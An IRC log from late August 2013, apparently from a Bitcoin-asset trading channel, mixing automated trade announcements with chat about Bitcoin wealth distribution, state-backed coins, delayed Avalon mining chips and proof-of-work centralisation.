22:30:45 Maker taker! Aug 29 22:30:49 someone do it with maker taker Aug 29 22:30:57 but i suppose 'if its not broken, dont fix it' can be a valid argument sometimes as well Aug 29 22:31:15 the thing is i know what doesn't work, i don't need to experiment to discover what's wrong with boiler rooms, wash trading, pump and dumps or all the rest of the "internet investment" stuff. Aug 29 22:31:17 matuszed, you could probly convince Havelock Aug 29 22:31:27 You serious Aug 29 22:31:47 even Burnside has considerd it Aug 29 22:32:02 you can build a lot with mpex as is Aug 29 22:32:15 the optiins and diff market are very open Aug 29 22:32:20 well actually mpex has always had it eh ? Aug 29 22:32:30 0% fees to sell stuff. Aug 29 22:32:40 0.2% to buy stuff Aug 29 22:32:49 http://pastebin.com/p9gjgiKu Aug 29 22:32:51 Bitfury EU August orders will ship before 1st September 2013 This is met. B - Pastebin.com Aug 29 22:33:00 please let me know is there something wrong there Aug 29 22:33:16 Anduck why not start a blog at thius point ? Aug 29 22:33:28 mircea_popescu: i just want the bet to be resolved correctly :) Aug 29 22:33:54 ppl will want to comment on the pastebin lol Aug 29 22:34:18 but since you're here, link the pix to the other two ? Aug 29 22:34:31 https://bitcointalk.org/index.php?topic=250249.620 Aug 29 22:34:35 this thread, 2 or 3 last pages Aug 29 22:34:41 dyaheon and foofighter Aug 29 22:35:06 mircea_popescu: there's nothing to comment in that pastebin. it's all just facts and how the bet is Aug 29 22:35:24 but if someone wants to comment it, comment here..? Aug 29 22:35:46 anduck put it as comment to bitbet and you'll see Aug 29 22:35:50 [HAVELOCK] [LABCO] 6 @ 0.00329 = 0.0197 BTC [+] Aug 29 22:35:57 ok Aug 29 22:36:22 i put the link there.. no need to spam it more :O Aug 29 22:37:18 well it's relevant. Aug 29 22:38:59 [BTCTC] [TAT.ASICMINER] 19 @ 0.0262 = 0.4978 BTC [-] Aug 29 22:39:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0262 BTC [-] Aug 29 22:39:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.0262 = 0.0786 BTC [-] Aug 29 22:39:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0262 BTC [-] Aug 29 22:41:05 ;;bc,stats Aug 29 22:41:07 Current Blocks: 254910 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 1121 blocks | Next Difficulty In About: 5 days, 15 hours, 11 minutes, and 45 seconds | Next Difficulty Estimate: 78136705.381 | Estimated Percent Change: 18.83899 Aug 29 22:45:14 [HAVELOCK] [CFIG] 3 @ 0.1799 = 0.5397 BTC [+] Aug 29 22:47:16 [BTCTC] [TAT.ASICMINER] 37 @ 0.0262 = 0.9694 BTC [-] Aug 29 22:48:21 [BTCTC] [DMS.PURCHASE] 60 @ 0.01594 = 0.9564 BTC [-] Aug 29 22:50:14 [BTCTC] [ASICMINER-PT] 1 @ 2.684 BTC [+] Aug 29 22:50:40 [BTCTC] [ASICMINER-PT] 1 @ 2.685 BTC [+] Aug 29 22:51:29 [BTCTC] [ASICMINER-PT] 2 @ 2.685 = 5.37 BTC [+] Aug 29 22:52:48 [BTCTC] [ACTIVEMINING] 50 @ 0.004429 = 0.2215 BTC [-] Aug 29 22:52:50 [BTCTC] [ACTIVEMINING] 950 @ 0.004425 = 4.2038 BTC [-] Aug 29 22:55:14 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] Aug 29 22:55:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.02628 = 0.0526 BTC [+] Aug 29 22:55:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.02628 = 0.0788 BTC [+] Aug 29 23:01:01 "I'm extremely happy that Friedcat returned that transaction fee mistake. Integrity is worth a lot more than 200 coins (no matter what BTC ends up being worth)." Aug 29 23:01:17 (regarding a block that has an insanely high tx fee in it) Aug 29 23:01:22 what am i missing here? Aug 29 23:01:26 [BTCTC] [LABCOIN] 9 @ 0.0037 = 0.0333 BTC [-] Aug 29 23:01:32 how is this a sign of integrity Aug 29 23:01:41 sure it's nice n all Aug 29 23:01:41 FC returned the tx fee, instead of keeping it. Aug 29 23:01:56 but if he hadnt returned it he'd be a bad guy? Aug 29 23:02:10 yes. Aug 29 23:02:16 sure! Aug 29 23:02:23 im mad as share holder Aug 29 23:02:29 ! Aug 29 23:02:44 what if he just didnt even notice? Aug 29 23:02:45 thats mining revenue wasted Aug 29 23:02:53 is he now a neglectful bad guy? Aug 29 23:02:54 ThickAsThieves: karma is a bitch Aug 29 23:03:25 maybe the guy losing the 200btc had the bad karma Aug 29 23:03:26 is bad for his chi Aug 29 23:03:40 and no FC has it Aug 29 23:03:41 now* Aug 29 23:04:16 ThickAsThieves: the ownder has over 10,000 BTC -- likely a criminal/money launderer -- friedcat sohuld have kept it, he has a responsibility to shareholders Aug 29 23:04:31 whoa waity a sec Aug 29 23:04:37 wat Aug 29 23:04:42 over NINE THOUSAND?! Aug 29 23:04:49 if it was a guy with 201 BTC who lost 200BTC , id say return it right away.... how bad can you feel about someone with 10,000+ BTC laundering coins losing 200? Aug 29 23:04:51 if you have 10000btc you are presumed a criminal now? Aug 29 23:05:00 ThickAsThieves: no. Aug 29 23:05:20 lol what, rich people are bad mkay ? Aug 29 23:05:40 [BTCTC] [DMS.PURCHASE] 1 @ 0.01594 BTC [-] Aug 29 23:05:42 http://s3-ec.buzzfed.com/static/enhanced/webdr05/2013/8/28/14/anigif_original-grid-image-17411-1377714301-29.gif Aug 29 23:05:49 (unrelated) Aug 29 23:05:53 lol Aug 29 23:05:59 irllol Aug 29 23:06:30 is bad for his chi <<<<<<< YESSSSSSSS! REPOSTED FOR POSTERITY: YIFU - http://imgur.com/Tr8HVI6 Aug 29 23:06:58 lol Aug 29 23:07:15 the 200BTC was returned to this address --> https://blockchain.info/address/12HUyZeNFqk4db2EM7GY5e6homTVTpPd7Z Aug 29 23:07:34 [MPEX] [S.MPOE] 8077 @ 0.00087157 = 7.0397 BTC [+] Aug 29 23:07:35 [MPEX] [S.MPOE] 13957 @ 0.00087254 = 12.178 BTC [+] Aug 29 23:07:42 ;;ticker Aug 29 23:07:43 MtGox BTCUSD ticker | Best bid: 128.92001, Best ask: 129.00000, Bid-ask spread: 0.07999, Last trade: 129.49995, 24 hour volume: 9171.09358164, 24 hour low: 128.18000, 24 hour high: 131.72442, 24 hour vwap: 129.34495 Aug 29 23:07:48 [BTCTC] [LABCOIN] 1200 @ 0.00368 = 4.416 BTC [-] Aug 29 23:08:07 It's likely , but not certain, that people who stole large amounts of bitcoins will try to launder them before cashing out on MTGOX. Aug 29 23:08:11 re labcoiners hating mp "I agree 100%. Right after his little post I thought "wow, didn't he show this same distaste towards asicminer at one point?" This was the biggest signal for me, and I bought up a shitload.. " Aug 29 23:08:32 I've been short AM since 0.4 Aug 29 23:09:00 on paper.. ;) Aug 29 23:09:06 oh wait, one more dig Aug 29 23:09:08 i'll buy under .1 , maybe Aug 29 23:09:09 "and just for the record, I think he's really good at running an exchange that has no securities." Aug 29 23:09:29 i think it will hit 0 before .1 Aug 29 23:09:54 How many entities do you guys think own over 10,000 BTC? 100, 200, 500? Aug 29 23:10:06 someone should send the labcoiners a digest list of glbse muppets hating mp back in like... august 2012. Aug 29 23:10:28 200+ Aug 29 23:10:37 1-200. Aug 29 23:10:49 there's not that much space, plenty of people own more than 10k Aug 29 23:10:59 bitcoin is quite top heavy Aug 29 23:11:06 you think 200 max? Aug 29 23:11:27 well it's hard to say. Aug 29 23:11:37 What about 1000 BTC? 5000? Aug 29 23:11:41 there is some analysis out there on this topic Aug 29 23:11:49 ive stumbled over it at times Aug 29 23:11:59 ThickAsThieves: its hard to do, unless addresses are linked Aug 29 23:12:12 MTGOX has a great idea though ;) Aug 29 23:12:23 heh Aug 29 23:12:36 10k+ is ter(r)anode? Aug 29 23:12:45 I'm just thinking that, if someone wanted to be top 5000 richest BTC in the world, how many would he need to buy right now? Aug 29 23:13:09 not much Aug 29 23:13:16 500? 1000? Aug 29 23:13:28 [BTCTC] [LABCOIN] 1 @ 0.003699 BTC [+] Aug 29 23:13:29 take a guess Aug 29 23:13:47 https://twitter.com/modsix/status/373176507159433216 Aug 29 23:13:50 500 Aug 29 23:13:50 Twitter / modsix: @BitOTTer [BitOTTerBot] is ... Aug 29 23:14:28 neato Aug 29 23:14:45 mod6 , #mpex is something else Aug 29 23:14:51 cool.. I think 2,100 is a good goal for someone with a lot of money, and very bullish on bitcoin -- mathmatically no more then 10,000 people can own as much as you, and in reality it will likely be 1000 or less in the future Aug 29 23:14:59 top 5000 isnt exact;y a monument Aug 29 23:15:11 how many bitcoiners are there with any btc? Aug 29 23:15:16 ThickAsThieves: worldwide? you're 0.000001% rich in 2050 Aug 29 23:15:17 maybe 200k? Aug 29 23:15:25 jurov: lol. Aug 29 23:15:36 ThickAsThieves: i'm extrapolating for world-wide BTC usage in the future Aug 29 23:15:42 i care not. Aug 29 23:16:00 fractal, that's too unclear to attempt imo Aug 29 23:16:14 bitcoin will have competition Aug 29 23:16:37 [BTCTC] [CB.IDIFF-E] 10 @ 0.029 = 0.29 BTC Aug 29 23:16:43 ThickAsThieves: competition that will replace it? Aug 29 23:16:55 obv no one can answer that Aug 29 23:17:08 fractal prolly 1k gets you in the top 5k Aug 29 23:17:13 on a long enough timeframe yes Aug 29 23:17:47 prolly 1k gets you in the top 1k for that matter. Aug 29 23:17:55 yeah Aug 29 23:17:57 probably Aug 29 23:18:56 i wanna know how many people have bitcoins Aug 29 23:19:11 well coinbase claims to have 238,000 users Aug 29 23:19:16 who knows how many have coins Aug 29 23:19:25 Im like 5000 users on there alone Aug 29 23:19:30 theres been millions of downloads of the client Aug 29 23:19:32 haha Aug 29 23:19:51 so id say.. maybe 15k? Aug 29 23:20:08 lol matuszed Aug 29 23:20:12 well. around 2-3 million coins have never been moved right? 1 Million is satoshi and 1-2Milion lost -- lets say theres 8M coins in real peoples hands -- 5000 people holding 1000BTC would take up 5M BTC and mean only 3M is left as float Aug 29 23:20:30 rreally 1-2mil lost? Aug 29 23:20:30 i think less then 5000 people have 1000BTC Aug 29 23:20:33 nice Aug 29 23:20:39 fractal large holders are part of the float as much as small holders. Aug 29 23:21:05 ThickAsThieves: thats what i've gathered from reading forums -- one guy talked about mining 50K coins and then formatting his HD Aug 29 23:21:19 basically there's a 1-200 people that matter, holding like 90% of all coins. there's ~10k people with modest holdings, doing another 9% Aug 29 23:21:22 it was fake money in 2009 Aug 29 23:21:27 yeah but then there are some people with 10000_ and 100,000+ Aug 29 23:21:31 then there's ~100k people who have some dust, post on forums, what have you Aug 29 23:21:36 it was just as real in 2009 Aug 29 23:22:20 this conversation just makes me wanna hoard harder Aug 29 23:23:01 i would guess group 1 median is somewhere in the 50k range. group 2 median probably about 80-150 btc Aug 29 23:23:09 group 3 median like 0.05 to 0.1 Aug 29 23:23:55 [BTCTC] [DMS.SELLING] 7 @ 0.01258 = 0.0881 BTC [+] Aug 29 23:24:59 [BTCTC] [LABCOIN] 300 @ 0.003699 = 1.1097 BTC [+] Aug 29 23:25:39 biggest design flaw in bitcoin: the decimal Aug 29 23:25:41 :) Aug 29 23:25:46 heh Aug 29 23:26:26 So, if 1 million people use BTC in 2015, what amount do you think would put you in top 10,000 ? Aug 29 23:27:06 Thats the most impossible question in the world to answer Aug 29 23:27:09 the price will likely be $1000 by then, and lots of large holders would probably sell Aug 29 23:27:15 fractal, just buy 100k S.MPOE now Aug 29 23:27:36 but theyd need to sell less if price was that high Aug 29 23:27:49 fractal i doubt large holders will ever sell. Aug 29 23:28:01 they jhave no incentive to, as they already have more fiat than they know what to do with Aug 29 23:28:08 which is how they ended up with btc in the first place. Aug 29 23:28:13 not that hard -- we can use Gold as model for BTC -- kings and tyrants were the largest gold holders, and slowly holdings moved Aug 29 23:28:27 you can steal gold. you can't hardly steal btc. Aug 29 23:28:41 mircea_popescu: right... so rich fiat btc users will hold , and poor btc users who mined will sell Aug 29 23:28:46 tell that to labcoin Aug 29 23:28:53 fractal pretty much. Aug 29 23:29:01 we're her to take over the world and reshape it drastically Aug 29 23:29:23 not make a few million. fuckall cares. the idea is that the us president will take office upon swearing an oath to the conclave of bitcoin. Aug 29 23:29:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.02628 = 0.0788 BTC [+] Aug 29 23:29:43 mircea_popescu: hahaha amazing response. Aug 29 23:29:48 which as a side point makes all the sec posturing rather lol. Aug 29 23:29:48 bravo. Aug 29 23:30:03 as in "sec who and quo warranto ?" Aug 29 23:30:29 whats the command to see the avg price up and down the gox orderbook? Aug 29 23:30:34 I really think world governments have no clue what is going to hit them in 2-3 years Aug 29 23:31:03 it will be interesting to see MPEX replace carlos slim on forbes top 100 though ;) Aug 29 23:31:06 i tried telling my wife this stuff last night Aug 29 23:31:19 she now sees me as a little crazier than before Aug 29 23:31:49 ya well. but it's what it is. Aug 29 23:31:51 [HAVELOCK] [HIM] 1 @ 0.2055 BTC [+] Aug 29 23:31:52 ThickAsThieves: which makes it even better when you end up being right... your brilliance will shine throughout the ages Aug 29 23:31:59 "o, we have a mandate fgrom the voters" "well, d othose voters hold any birtcoin ?" Aug 29 23:32:04 it's very difficult for people to digest that bitcoin will disrupt Aug 29 23:32:06 "no" "then stfu and get back in line" Aug 29 23:32:17 ThickAsThieves s/that/what Aug 29 23:32:41 fractal it'd never be forbes top 100. Aug 29 23:33:09 [HAVELOCK] [AM100] 10 @ 0.025801 = 0.258 BTC [+] Aug 29 23:33:21 ...and bitcoin-assets logs will be studied carefully by historicians. Aug 29 23:33:25 ^ i have a bit of an issue with this :) Aug 29 23:33:30 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [+] Aug 29 23:33:32 [BTCTC] [ASICMINER-PT] 1 @ 2.729 BTC [+] Aug 29 23:33:33 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [+] Aug 29 23:33:34 [BTCTC] [ASICMINER-PT] 1 @ 2.742 BTC [+] Aug 29 23:33:34 [BTCTC] [ASICMINER-PT] 1 @ 2.744 BTC [+] Aug 29 23:33:35 [BTCTC] [ASICMINER-PT] 1 @ 2.748 BTC [+] Aug 29 23:33:36 [BTCTC] [ASICMINER-PT] 4 @ 2.75 = 11 BTC [+] Aug 29 23:33:37 [BTCTC] [ASICMINER-PT] 8 @ 2.76 = 22.08 BTC [+] Aug 29 23:33:39 [BTCTC] [ASICMINER-PT] 1 @ 2.76 BTC [+] Aug 29 23:33:40 [BTCTC] [ASICMINER-PT] 2 @ 2.782 = 5.564 BTC [+] Aug 29 23:33:41 [BTCTC] [ASICMINER-PT] 2 @ 2.79 = 5.58 BTC [+] Aug 29 23:33:42 [BTCTC] [ASICMINER-PT] 4 @ 2.795 = 11.18 BTC [+] Aug 29 23:33:43 [BTCTC] [ASICMINER-PT] 2 @ 2.8 = 5.6 BTC [+] Aug 29 23:33:44 [BTCTC] [ASICMINER-PT] 1 @ 2.81 BTC [+] Aug 29 23:33:44 [BTCTC] [ASICMINER-PT] 1 @ 2.813 BTC [+] Aug 29 23:33:45 [BTCTC] [ASICMINER-PT] 1 @ 2.818 BTC [+] Aug 29 23:33:46 [BTCTC] [ASICMINER-PT] 1 @ 2.819 BTC [+] Aug 29 23:33:47 [BTCTC] [ASICMINER-PT] 1 @ 2.825 BTC [+] Aug 29 23:33:48 heh Aug 29 23:33:48 [BTCTC] [ASICMINER-PT] 1 @ 2.829 BTC [+] Aug 29 23:33:49 [BTCTC] [ASICMINER-PT] 1 @ 2.848 BTC [+] Aug 29 23:33:52 pump it up Aug 29 23:33:58 ThickAsThieves: although, I see when governments realize what crypto-currency implications are -- they will issue state-sanctioned alt-chains.... this the the only thread to BTC Aug 29 23:34:12 thats ok Aug 29 23:34:13 fractal would you buy it ? Aug 29 23:34:25 the sheeple might buy it Aug 29 23:34:29 they could never hold to it being deflationary Aug 29 23:34:32 USACoin would be adopted quickly with government backing, and likely grow to a larger marketcap then BTC Aug 29 23:34:37 even if they said they will Aug 29 23:34:42 mircea_popescu: yes, due to sheep using it Aug 29 23:34:44 fractal: dude it's "than" Aug 29 23:34:46 even if they did, i bet the exchange rate to BTC would be the same as USD Aug 29 23:35:00 zoinky pretty much. Aug 29 23:35:23 [BTCTC] [ASICMINER-PT] 1 @ 2.845 BTC [-] Aug 29 23:35:25 [BTCTC] [ASICMINER-PT] 2 @ 2.849 = 5.698 BTC [+] Aug 29 23:35:30 actually state sanctioned chains would make bitcoin worth more than the sum of all the chains just on that strength alone Aug 29 23:35:38 if they want to commit to even attempting an Americoin, theyd need to back it Aug 29 23:35:42 put 10 units of faith in your state chain and by that fact 14 into bitcoin Aug 29 23:35:46 and not print more of it Aug 29 23:35:51 its more of a 'USCoin is legal tender, and you can pay taxes in USCoin' that means people will have to sell BTC to buy USCoin to pay taxes -- UScoin will be more valuable Aug 29 23:36:02 which would be progress Aug 29 23:36:07 but theyd never hold to it Aug 29 23:36:11 just like the gold stanadrd Aug 29 23:36:15 fractal not really. people would keep their savings in btc and buy chinacoin/uscoin/swisscoin as needed Aug 29 23:36:45 the only way the state thing could seriously disrupt was if there were only one state. Aug 29 23:36:52 which there isn't, and so bitcoin is soon enough on this score. Aug 29 23:37:04 mircea_popescu: maybe... it will be interesting to see how it plays out in a few years. i predict the US minting virtual currency is a certainty at some point Aug 29 23:37:14 more likely to have Amazon or Google coin as a threat than the usacoin Aug 29 23:37:15 but yes, in a historical perspective this is correct, had it been a few decades late it'd have bnever vbeen possible as such Aug 29 23:37:35 ThickAsThieves usacoin wouldbe implemented as a googlecoin Aug 29 23:37:42 it is a fascist state after all. uses statal corporations. Aug 29 23:38:05 haha... you've been reading the zerohedge article on assange and schmidt meeting? Aug 29 23:38:07 ;) Aug 29 23:38:13 nope Aug 29 23:38:20 not familiar Aug 29 23:38:47 nope Aug 29 23:39:11 ;market buy 50000 Aug 29 23:39:14 Basically the NSA government uses large corp's to help them gather information -- nothing that is surprising or out of the ordinary. i dont know why people are shocked at the news. all states , communist, fascist, or otherwise do this Aug 29 23:39:16 ;;market buy 50000 Aug 29 23:39:17 A market order to buy 50000 bitcoins right now would take 8575337.2782 USD and would take the last price up to 300.0000 USD, resulting in an average price of 171.5067 USD/BTC. | Data vintage: 0.0045 seconds Aug 29 23:39:19 [BTCTC] [LABCOIN] 1 @ 0.003693 BTC [-] Aug 29 23:39:37 the corporations and the state share the same intrests -- its obvious they would help eachother Aug 29 23:39:44 [MPEX] [S.MPOE] 6282 @ 0.00087334 = 5.4863 BTC [+] Aug 29 23:39:46 [MPEX] [S.MPOE] 1599 @ 0.00087114 = 1.393 BTC [-] Aug 29 23:39:49 fractal this particular state-corporation ammalgamation is what historical fascism is known for economically. Aug 29 23:40:23 the mechanisms and physiology is quite different from the capitalist state Aug 29 23:40:42 so if bitcoin is this powerful Aug 29 23:40:46 why is the price so low? Aug 29 23:40:50 mircea_popescu: yes, but the actual impact of it is mostly overblown in americas case.... its mostly a laissez fair keynesian capitalist state Aug 29 23:40:55 gotta be more nerds with money Aug 29 23:40:58 i disagree. Aug 29 23:41:00 willing to throw millions at it\ Aug 29 23:41:12 ThickAsThieves: we're smarter then everyone else. im actually serious. Aug 29 23:41:18 than! Aug 29 23:41:24 people still laugh if i mention bitcoin Aug 29 23:41:28 ThickAsThieves because while it could end up realising that power, odds are it won't. judging by the average iq and ability of people involved... Aug 29 23:41:31 ThickAsThieves: no idea why tech billionaires haven't bought up 100K+ BTC Aug 29 23:41:37 (where involved = self reportedly involved) Aug 29 23:41:53 because they are billionaires Aug 29 23:42:12 fractal large holders are usally risk averse. Aug 29 23:42:35 hahahah you gotta love mircea_popescu's confidence ;) i actaully love seeing MPOE-PR posts on the forums and the rage replies.... although it will only work as long as he's right about everything ;) Aug 29 23:42:44 better not be wrong! Aug 29 23:42:51 it's happened that i was wrong im pretty sure. Aug 29 23:43:04 and did it humble you at all? ;) Aug 29 23:43:16 what, i'm very humble. Aug 29 23:43:56 you were wrong?? when? Aug 29 23:44:12 i recall the girl not realizing how many coins AM had actually paid out to shareholders Aug 29 23:44:17 wtf is going on with the Avalon chips, they finally admitted there are none coming? Aug 29 23:44:29 jborkl: they're coming, but delayed.... Aug 29 23:44:49 jborkl: then shipped to chineese resellers first, according to rumours , before international orders... thats why people are mad Aug 29 23:45:02 heh. ethical :D Aug 29 23:45:04 you sure, I have seen stuff today that is leading to think they are never coming Aug 29 23:45:06 [MPEX] [S.MPOE] 1303 @ 0.00087495 = 1.1401 BTC [+] Aug 29 23:45:08 [MPEX] [S.MPOE] 21997 @ 0.00087501 = 19.2476 BTC [+] Aug 29 23:45:14 not that i did before heh Aug 29 23:45:16 jborkl link ? Aug 29 23:45:24 of course, delayed is just as bad as not shipping at all since if difficulty is too high, the chips are useless ..... but thats another argument Aug 29 23:45:27 one sec lemme find it Aug 29 23:45:33 ;;nethash Aug 29 23:45:34 613384.094317 Aug 29 23:45:39 yum Aug 29 23:45:40 ;;echo .d Aug 29 23:45:41 .d Aug 29 23:45:41 65750060.14908 | Next Diff in 1114 blocks | Estimated Change: 18.5786% in 6d 7h 3m 0s Aug 29 23:45:46 ;;estimate Aug 29 23:45:47 Next difficulty estimate | 78149439.9984 based on data since last change | 85687460.5852 based on data for last three days Aug 29 23:45:49 [BTCTC] [ACTIVEMINING] 500 @ 0.004818 = 2.409 BTC [+] Aug 29 23:45:50 [BTCTC] [ACTIVEMINING] 50 @ 0.004819 = 0.241 BTC [+] Aug 29 23:45:52 [BTCTC] [ACTIVEMINING] 450 @ 0.00482 = 2.169 BTC [+] Aug 29 23:46:21 20% in 6 days ?! didn't it JUST switch ? Aug 29 23:46:26 like, yesterday ? Aug 29 23:46:27 Am I the only person who thinks that the network will be stronger if the PoW was changed to a algo that couldn't be performed in custom hardware? (i..e gpu's only) Aug 29 23:46:38 https://bitcointalk.org/index.php?topic=177827.1260 Aug 29 23:46:44 you're not the only person, but you're wrong along with the rest of em Aug 29 23:46:44 All I see is mining centralization which will end when Intel builds 14nm chips in 2015 Aug 29 23:46:46 [CLOSED] Avalon ASIC chip distribution Aug 29 23:46:52 that is just one of the pages, lemme find more Aug 29 23:46:52 fractal: you're implying that algo's cannot be done in custom hardware Aug 29 23:47:03 any algos* Aug 29 23:47:09 [BTCTC] [DMS.MINING] 1 @ 0.00345 BTC [-] Aug 29 23:47:29 you cant make a algo that could only be done in gpus Aug 29 23:47:40 midnightmagic seriously, how's the ethicalness going these days ? Aug 29 23:47:43 Thats correct -- my assumption is that the best PoW would be one that performs best in common computer hardware -- using all aspects -- RAM, Memory, and computing power Aug 29 23:47:54 it would ensure a decentalized network Aug 29 23:47:58 that is scrypt and it sucks Aug 29 23:48:03 fractal there's such a thing as a turing machine Aug 29 23:48:13 you're trying to solve a problem by dancing around it Aug 29 23:48:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008717 BTC [+] Aug 29 23:48:28 rahter dance inside it Aug 29 23:48:56 lol Aug 29 23:49:02 mircea_popescu: I understand that custom hardware could be build for any algo, but my goal would to make it not cost-effective until the coin had a market cap of say $100B Aug 29 23:49:31 what makes you think i'm not humble when you display the unmitigated audacity to pick numbers ? Aug 29 23:49:33 why 100b ? Aug 29 23:49:46 it doesnt work like that anyway Aug 29 23:50:09 indeed. Aug 29 23:50:44 A PoW that required lots of disk-access, RAM, and processing power, would sort of make custom hardware useless to build --- assuming that such a PoW algo could be made Aug 29 23:51:11 https://bitcointalk.org/index.php?topic=179769.2600 Aug 29 23:51:16 [Work in progess] Burnins Avalon Chip to mining board service Aug 29 23:51:27 burnin, that actually made a nice board with Avalon sample chips Aug 29 23:51:32 so you want uselessness to be a factor? Aug 29 23:51:33 because why ? Aug 29 23:51:38 gone to complete shit also Aug 29 23:51:51 sucks. Aug 29 23:52:08 gmaxwell said that a tough PoW algo that used all aspects of a general-purpose computer could still probably be sped up by up around 20% on custom hardware --- but that isn't much of a margin to make it worth it until the market cap and mining reward are very high Aug 29 23:52:11 [BTCTC] [ASICMINER-PT] 1 @ 2.839 BTC [-] Aug 29 23:52:13 Activemining - also seen information that they are not getting the 20,000 chips Aug 29 23:52:22 that's one sad turn of events tbh, they certainly impressed back in the fpga days when they figured out what old chips bfl sanded off to pass as their ip Aug 29 23:52:50 mircea_popescu: also, Dan Kamisky thinks the SHA algo will be replaced due to centralized mining --- he seems to be a pretty smart guy ;) Aug 29 23:52:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.02628 = 0.2628 BTC [+] Aug 29 23:52:54 [BTCTC] [ASICMINER-PT] 1 @ 2.839 BTC [-] Aug 29 23:53:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.02628 = 0.1051 BTC [+] Aug 29 23:53:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02628 BTC [+] Aug 29 23:53:27 but big miners will not want to change it Aug 29 23:53:32 so how is that gonna happen Aug 29 23:53:53 why would we want to go to scrypt?, screw that Aug 29 23:54:02 fractal there's two layers. on one layer, all this is roughly aggitation from a bunch of dishonest people trying to serve the interests of their political masters. Aug 29 23:54:06 burns up gpu's like butter Aug 29 23:54:15 what with gavin going on about introducing a server that can turn off transactions etc. Aug 29 23:54:39 on the other layer, there's no particular advantage to any one structure of transistors. Aug 29 23:54:42 kakobrekla: big miners will lose the vote to small miners who would likely start using a new PoW if it meant they could mine on their own rigs again from parts they buy at the store Aug 29 23:54:45 they're all man made, they'll all be man made. Aug 29 23:54:46 [HAVELOCK] [CFIG] 2 @ 0.1799 = 0.3598 BTC [+] Aug 29 23:54:54 "With ASICMINER today announcing blades for as low as 3.5BTC, it appeared that Avalon chips that do not mine today are not going to break even any more. While those blades went already out of stock after some hours, the new price for mining rig is officially set. Essentially this means that if Avalon does not ship the remaining chips fully within the next two weeks, they become worth Aug 29 23:54:54 less than their shipping costs." Aug 29 23:55:01 shitty Aug 29 23:55:02 we have absolutely no problem producing parts as it is now. Aug 29 23:55:14 fractal imo you maffs are off Aug 29 23:55:15 wait, you know there is LTC right? Aug 29 23:55:31 and frecoin, bigcoin, smallcoin .... Aug 29 23:55:39 and vagcoin Aug 29 23:55:43 oh yeah Aug 29 23:55:45 [BTCTC] [LABCOIN] 1 @ 0.003697 BTC [+] Aug 29 23:55:46 [BTCTC] [LABCOIN] 44 @ 0.003698 = 0.1627 BTC [+] Aug 29 23:55:52 wasnt there a buttsexcoin? Aug 29 23:55:55 basically diff explodes at an exponential rate and somehow people are concern-trolling about how there's not enough parts out or some shit. Aug 29 23:56:21 kako, a PoW that was most efficient on standard computer hardware would be the best to use, IMO, it would make centralized mining more difficult. Aug 29 23:56:35 no, that was called a botnet Aug 29 23:56:36 would it? Aug 29 23:56:41 I dont know if its possible for such a PoW to exist -- but i think it can be close Aug 29 23:56:54 we just got rid of that shit Aug 29 23:57:04 jborkl: good point on the botnet -- not sure if thats worse then centralized ASIC mining though. Aug 29 23:57:17 fractal what centralized ? Aug 29 23:57:19 id rather have the botnets Aug 29 23:57:23 lol. Aug 29 23:57:31 i guess that's why you don't get a vote then Aug 29 23:57:38 not centralize, gigas private pool is like 50th Aug 29 23:57:41 [BTCTC] [LABCOIN] 112 @ 0.003698 = 0.4142 BTC [+] Aug 29 23:57:42 [BTCTC] [LABCOIN] 28 @ 0.0037 = 0.1036 BTC [+] Aug 29 23:57:56 it is just private peoople Aug 29 23:58:03 mircea_popescu: some devs expressed the same sentiment as me regarding botnets Aug 29 23:58:15 jborkl yeah, all the shit he stole from people, and all the shit his friends stole from people. Aug 29 23:58:23 amazingrando, hashking, the lot. Aug 29 23:58:27 I am not advocating giga, btw Aug 29 23:58:39 fractal you do realise the devs don't get a vote, either, do you ? Aug 29 23:58:55 what vote? Aug 29 23:59:10 as to whether we break bitcoin to make teh gobernmint happy or no. Aug 29 23:59:12 hash vote? Aug 29 23:59:38 if you have 100 gh, you get to vote as a miner with 100 gh Aug 29 23:59:39 devs vote to install voting system Aug 29 23:59:53 can we do if you have 1000btc instead? Aug 30 00:00:05 do you pool mine, solo mine, rent out your hash to gpumax Aug 30 00:00:12 as it stands right now, any attack on the bitcoin network requires the attacker spend some dough on making chips. Aug 30 00:00:17 last one was so fucking stupid Aug 30 00:00:17 this is a fixed cost of money and time. Aug 30 00:00:30 mircea_popescu: if you follow the inevitable logic -- the entity with access to the smallest manufacturing process will control a PoW such as SHA256. There is 1 entity who always has the smallest fab process -- Intel.. they can do 14nm and put the rest out of business. They won't until the US Government asks them to, or until mining is worth $5B / year or so to make it worth it Aug 30 00:00:38 if we fall for this poisonous nonsense, about six different governments can attack the network just out of spare parts they got laying about. Aug 30 00:00:48 so basically, Intel controls bitcoin Aug 30 00:00:56 this is out of the querstion, pretty much. Aug 30 00:01:00 [BTCTC] [LABCOIN] 26 @ 0.003698 = 0.0961 BTC [-] Aug 30 00:01:01 no, we have been through this a year ago Aug 30 00:01:05 we already have in private hands the technoklogy to make miners. Aug 30 00:01:07 looks like Samsung, not Intel Aug 30 00:01:13 we DO NOT have the technoplogy to make "Average computers" Aug 30 00:01:54 plus you are forgetting all about my quantum miner Aug 30 00:01:54 Intel is the ONLY fab in the world going to do 14nm chips -- that practically puts all other ASIC out of business Aug 30 00:01:56 a move away from sha would be a move away from free market and independece. Aug 30 00:02:01 fractal does not. Aug 30 00:02:28 how does intel make money taking over bitcoin? Aug 30 00:02:51 they would just fuck up and deliver in 5 years or so Aug 30 00:02:56 right-o. Aug 30 00:02:59 http://blockchain.info/charts/hash-rate Aug 30 00:03:01 Bitcoin Hash Rate Aug 30 00:03:12 mircea_popescu: you're right... i just looked it up and samsung is making 14nm as well... Aug 30 00:03:12 something is gonna have to change soon. Aug 30 00:03:30 fractal more important : there are dozens of people who can make their own miners as it is now. Aug 30 00:03:34 this has been proven. Aug 30 00:03:37 then we'll have nanocarbon and biochips etc Aug 30 00:03:43 